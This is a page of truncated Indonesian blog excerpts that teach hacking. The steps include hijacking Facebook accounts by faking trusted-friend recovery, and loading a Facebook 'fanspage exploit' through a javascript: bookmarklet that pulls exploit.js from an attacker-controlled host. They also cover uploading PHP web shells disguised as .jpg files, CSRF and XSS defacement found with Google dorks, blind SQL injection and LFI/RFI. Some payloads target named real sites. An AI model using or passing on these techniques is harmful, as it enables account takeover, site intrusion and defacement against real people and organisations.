Irfan Prasetya Blog

Assalamualaikum... Sobat, saatnya bilang wow? Tunggu dulu sebelum sobat mencoba trik ini.. :p langsung ke topik,, hehehe :D Trik ini mudah saja, semua orang bisa melakukannya :p yang diperlukan adalah sobat harus memiliki beberapa akun facebook minimal tiga, tapi baiknya lebih dari 3 ;) buat saja akun facebook yang bnyak.. hehehehe dan usia akun facebook itu harus lebih dari 7 hari, kalo masih baru trik ini ga kan bekerja.. :p klo sudah punya beberapa akun, langsung saja berteman dengan target ;)jangan lupa, siapkan juga email yg baru.. ;) ini langkah2nya : 1. buka facebook.com. lalu klik forgot password / Lupa Password 2. lalu masukkan email atau username target.. klik search! 3. kalo udah ketemu akun target? klik aja "Ini Akun saya" 4. lalu pilih "Tidak lagi memiliki Akses ke sini" 5. masukkan email yg telah disiapkan sobat tadi.. 6.  kemudian ada perintah untuk menjawab pertanyaan. jawab aja salah jg gpp ;) 7. saatnya memilih 3 akun palsu yg kita buat sebelumnya....

Selamat pagi aja,, salam berbagi.. Sekarang saya mau share sedikit tentang trik bagaimana cara hack fanspage. tapi sebelumnya saya tekankan bahwa "Akun facebook / Fanspage itu bisa di hack karna factor Human Error".. oke langsung saja deh.. :) Hal-hal yang perlu dipersiapkan: 1. Fanspage Exploit Download  Password: Lihat 2. Hostingan Gratis (idhostinger,nazuka,dll) 3. Script Untuk Menjalankan Exploit 4. Email ID Facebookmu 5. Gunakan Otak (Pintar2) ;) Langkah-Langkah: 1. Edit exploit.js dengan notepad. cari bagian email ID, lalu ganti dengan email ID mu.. lalu save! 2. Buatlah Hostingan di hosting gratis , Silahkan baca Cara Membuat Hosting Gratis lalu upload exploit.js dan pastikan upload di public_html.. http://sitekamu.hostingan.com/exploit.js 3. Script untuk menjalankan Exploit.js yg sudah diupload di hostingan javascript:(a = (b = document).createElement(“script”)).src = “http://sitekamu.hostingan.com/exploit.js“, b.body.appendChild(a); void(0) Sekarang kamu hanya butuh...

Hi, ketemu lagi sama ane ./Cyber404 ^_^ Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shell, kebanyakan nyebutnya CONFIG . Ya udah tanpa mengulur waktu langsung saja kita masuk ke tutorialnya :D [+] BAHAN [+] Shell (kalau belum punya download disini ) MySQL (kalau belum punya klik  download ) #recode  1. Siapkan website yang udah kalian tanami shell/backdoor :D (sebagai contoh saya memakai http://sariamelia.com ) 2. Klik EVAL didalam shell/backdoor kalian ( lihat gambar ) 3. Jika sudah, lalu klik GO ( lihat gambar ) 4. Lalu copy semua yang terdapat dalam kolom tersebut ( lihat gambar ) 5. Next, kalian klik CONFIG ( tampilan seperti ini ) 6. Lalu, paste kode yang kalian dapat ( step 4) tadi di kolom yang disediakan ( lihat gambar ) 7. Lalu klik HAJAR, jika sukses tampilan kurang lebih akan seperti ini 8. Sekarang tinggal kalian panggil CONFIG nya, caranya  # Jika kalian upload shell tadi di wp-content maka manggilnya ht...

Assalamualaikum :) Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D Bahan-Bahan: 1. Download Script CSRF =============================================================== DOWNLOAD DISINI   Password: Lihat =============================================================== Note: Aktifkan Java Script untuk download!! 2. Download MadspotShell Disini  Extract dulu dari file Rar! 3. Cari target dengan DORK : inurl:/wp-content/themes/shepard inurl:/wp-content/themes/money inurl:/wp-content/themes/clockstone inurl:/wp-content/themes/ambleside inurl:/wp-content/themes/pacifico #Dork dikembangkan sendiri ya :) 4. Untuk coba2 gunakan Live Target  & Live Target 2 5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D 6. Titip Nama :: Indonesian Cyber Army ( IDCA ) |   Stealth Defacer Hacking Team (SDHT) # Persiapan sudah selesai, sekarang tinggal kita eksekusi :) 7. Download Video Tutorial | Pass : ...

Selamat siang semua, dari apda gak ada kerjaan mending nih ane share cara buat BOT Komentar :D Pertama tama kalian harus punya Hosting/Cpanel terlebih dahulu, kalo untuk percobaan sih pake hosting gratis aja :D , # MAAF, UNTUK MASALAH HOSTING KALIAN COBA CARI SENDIRI YA :p Oke next, saya umpamakan kalian sudah punya hosting jadi bahan yang dibutuhkan selanjutnya yaitu SCRIPT BOT, untuk script bot kalian bisa ambil DISINI  (Copas Semua) Untuk akses tokennya, kalian bisa ambil DISINI Contoh akses token : https://m.facebook.com/?_rdr#access_token= AAAAAC3zphqEBAJd8dlZCnizM6k2JsB3RTlpHafKIGLyeiEPmZBFp3zz9sk0ZB4DV90ur7kE4ZAv6rxnA0TF6hZCcpHn5ZCMSYNUMZCWADwVhQZDZD &expires_in=0 #Yang berwarna merah adalah akses tokennya Oke, untuk pemasangan nih kalian bisa lihat DISINI Untuk CRON JOB kalian bisa ke http://www.webcron.org sekian tutor semrawut dari ane :D # Nb : setelah selesai mengambil token, segera hapus aplikasi pengambilan akses token (DISINI) KALO GAGAL JUGA, BOLEH PM Ke E...

Langsung saja ;)   Dork : inurl:"/?ptype=post_listing" inurl:"/?ptype=post_event" inurl:"/?page=property_submit" intext:"Geo Places Theme by" intext:"(You can upload more than one images to create image gallery on detail page)"   Site:: - http://site.com/?ptype=post_listing - http:// site.com /?ptype=post_event - http:// site.com /path/?ptype=post_listing - http:// site.com /path/?ptype=post_event   Sebelumnya Rename dulu Shellmu jadi ext. jpg cth: shell.php.jpg / shell.php;.jpg Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File)     Hasilnya bisa dilihat - http:// site.com /wp-content/themes/GeoPlaces/images/tmp/[shellmu] - http:// site.com /path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]   Video Tutorial      

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit. 1. Siapkan dulu file shell.php seperti : C99Shell , Injection , atau lainya cari aja di google banyak 2. Rename dengan nama : shell.php.jpg 3. Install add ons Tamper Data dulu di browser mozilla kita , Download disini 4. Restart dan kita mulai upload 5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan 6. Trus Uploads shell.php.jpg kita dan tamper 7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah Sekarang anda tinggal cari dimana file shell anda berada . Dan buka...

Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, disini ane hanya berusaha memberikan apa yang ane punya dan bisa...  Apa sich Blind SQL Injection tu? Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut... disini GT memakai command : mid()= hampir sama fungsinya dengan substring() char()= adalah peubah dari karakter lanjut.. ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg.. kalau version 4..kita tidak memakai blind,karena v4 tidak support query information_schema kalau version 5,boleh pake ini,boleh pake sql inject yg bi...

Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability. Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini ! 1). Pertama, Masukan Dorknya : inurl:"/showcatrows.php?CategoryID=" 2) . Kalo sudah, Pilih salah satu web yang akan kita deface. Contoh : saya pakai web ini  http://www.examsolutions.co.uk/...?CategoryID=13 3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita. Contoh :  http://www.examsolutions.co.uk/...?CategoryID=13 "><marquee>...

Dalam artikel saya kali ini, saya akan menerangkan sedikit tentang apa itu Web Shell. Sebenarnya saya sudah sering dengar hal ini sejak dulu, tapi baru sekarang saya mempelajarinya, dan baru sempat posting saat ini. Web Shell, seperti namanya yaitu Shell yang berada dalam Web. Web Shell ini adalah sekumpulan script, yang dapat mengeksekusi perintah shell. Seperti yang terkenal saat ini adalah C99, r57, bypass, dan masih banyak lagi. Untuk setiap web shell akan berbeda-beda, sesuai dengan Web Server yang dipakai. Misal jika server menggunakan Apache (biasanya PHP), maka webShell dalam berntuk PHP Script, begitu pula dengan ASP, PERL, CGI, dll. Kali ini saya tidak akan menunjukan, bagaimana cara memasukan webShell tersebut ke server yang mau dihack. Saya disini hanya akan mencobanya pada server sendiri, dan untuk melihat, seberapa besarkah efek yang ditimbulkan C99 ini. Jika anda tertarik untuk bisa mengUpload webShell ini pada server korban, maka anda bisa menggunakan tehn...

Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue: Sebelumnya apa sih LFI dan RFI itu?? LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL. RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server. Penjelasan fungsi-fungsi yang dapat menyebabkan LFI/RFI: Code: include(); include_once(); require(); require_once(); Dengan syarat pada konfigurasi php di server: allow_url_include = on allow_url_fopen = on magic_quotes_gpc = off contoh: misalkan kita punya file index.php dengan content kodenya seperti ini, Code: <?php   include "../$_GET[imagefile]";   ?> misal $imagefile=image.php mungkin di url akan terlihat seperti ini bentuknya Code: http://www.[target].com/index.php?imagefile=image.php maka script ini akan menampilkan halaman image.php. nah disini attacker a...

langsung aja yahh.. deface palsu via sql injection? maksudnya? buat yg master,jgn d baca yahhh... cm niat utk share kok...hhe .. pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS.. gmn crnya ? lnjut .. 1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh. kl lupa nihh Code: http://hacker-newbie.org/showthread.php?tid=97 2.nah misal ud dpt target nihh.. Code: http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,3,4,5,6,7,8,9-- 3.cek versinya... Code: http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,@@version,4,5,6,7,8,9-- eh ternyata versi 4.. drpd cape ngeblind.. yaudah buat gaya2an..deface palsu ajaa.. kalian tw kan yg ngerubah ascii jd hex code? kl bingung, buka ini Code: http://dieq41.com/tools/text.html   nah coba buat script deface,misal Code: <h1>hacked by me</h1>   masukin ke bagian ASCII yg ada d web dieq41.. trus kl ud d masukin.. liat bagian hexadecimal,bakal muncul: Code: 3C...

Pengertian SQL Injection  SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :  id=$id;……. > Got Error Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url. Contoh :  http://situstarget.com/news.php?id=1’  http://situstarget.com/news.php?id=’1 Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork. Dork SQLi : inurl:azerty.php?id= , inurl:bouquin.php?id= , inurl:lien.php?id= , inurl:clavier.php?id= inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:games.php?id= inurl:iniziativa.php?in= inurl:curricu...